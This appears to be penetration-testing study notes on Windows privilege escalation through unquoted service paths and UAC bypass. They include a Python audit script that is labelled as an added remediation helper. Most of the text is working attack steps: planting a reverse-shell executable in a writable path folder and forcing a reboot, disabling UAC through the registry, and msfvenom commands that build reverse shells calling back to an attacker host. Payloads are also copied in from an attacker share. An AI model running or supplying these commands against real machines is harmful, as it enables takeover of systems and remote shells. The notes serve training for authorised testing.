Unquoted path Manual Exploitation

Typical case: a service binary installed under the C:\Program Files directory, which contains a space character in its name.

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation

WinPEAS lists candidate binary paths under its Services section.

Services can also be listed with:

net start
wmic service list brief
sc query
Get-Service
Services - Unquoted Paths
Conditions:

Path to the service binary is unquoted and contains spaces.
Service runs as LocalSystem or with equivalent administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:

Find all services with "auto" start mode (automatically started at system start-up), excluding those under C:\Windows and those whose path is already quoted:
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:

Find unquoted service binpaths for services running as SYSTEM/admin, e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.

Check whether you have FULL (F) or WRITE (W) permissions on a folder along the path using:

a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"

b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula

Generate a reverse shell payload and name it after the path component, e.g. A.exe.

Place the binary in the writable folder on the path so that it is executed instead of the real service binary, e.g. move A.exe "C:\Program Files\folder".

Trigger execution by restarting the computer (if the service has startmode = auto) with shutdown /r /t 0.
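As an added audit helper (not part of the original notes), the Python script below takes service rows in the shape of the wmic query above, flags those whose unquoted executable path contains a space, lists the intermediate binaries Windows would try in order (which is why the folder ACLs checked with icacls/accesschk matter), and produces the sc config command that quotes the path to fix it. The service rows are constructed sample data.

```python
import ntpath
import re

# Constructed (name, pathname, startmode) rows in the shape of the
# `wmic service get name,pathname,startmode` query above; made up, not
# taken from a real host.
SAMPLE_SERVICES = [
    ("adminsvc", r"C:\Program Files\A bad folder\adminservice.exe", "Auto"),
    ("quotedsvc", r'"C:\Program Files\Vendor App\svc.exe" -k run', "Auto"),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Manual"),
]

# Executable portion of an ImagePath, then optional arguments.
EXE_RE = re.compile(r"^(.*?\.exe)(\s+.*)?$", re.IGNORECASE)

def search_candidates(pathname):
    # For an unquoted path the service controller splits at each space and
    # tries that prefix with .exe appended before the intended binary, e.g.
    # C:\Program.exe, then C:\Program Files\A.exe, ... in that order.
    # Returns [] when the path is quoted or the exe portion has no space.
    if pathname.startswith('"'):
        return []
    m = EXE_RE.match(pathname)
    if not m or " " not in m.group(1):
        return []
    exe = m.group(1)
    prefixes = [exe[:i] for i, ch in enumerate(exe) if ch == " "]
    return [p + ".exe" for p in prefixes] + [exe]

def writable_check_dirs(pathname):
    # Parents of the intermediate candidates: the folders whose ACLs must
    # not grant standard users write access (what icacls/accesschk verify).
    return sorted({ntpath.dirname(c) for c in search_candidates(pathname)[:-1]})

def remediation(name, pathname):
    # sc command that quotes the executable, leaving any arguments as-is.
    m = EXE_RE.match(pathname)
    args = (m.group(2) or "").strip()
    fixed = f'\\"{m.group(1)}\\"' + (f" {args}" if args else "")
    return f'sc config "{name}" binPath= "{fixed}"'

def audit(services):
    # One (name, startmode, candidates, dirs_to_check, fix) tuple per finding.
    return [(n, s, search_candidates(p), writable_check_dirs(p), remediation(n, p))
            for n, p, s in services if search_candidates(p)]

if __name__ == "__main__":
    for name, mode, cands, dirs, fix in audit(SAMPLE_SERVICES):
        print(f"[{mode}] {name}: tried in order {cands}")
        print(f"  verify ACLs on: {dirs}\n  fix: {fix}")
```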

User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) may be turned on, which forces your user to answer UAC credential/consent prompts before performing privileged actions.

UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass

cmd> whoami /priv    # do we have very few privileges even as local admin?
cmd> whoami /groups  # is "Mandatory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?

# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
...
EnableLUA                  REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop      REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts
...

# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits

# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe

# generate reverse shell payload
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload

cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe

# alternative 32-bit payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=443 -f exe > program.exe
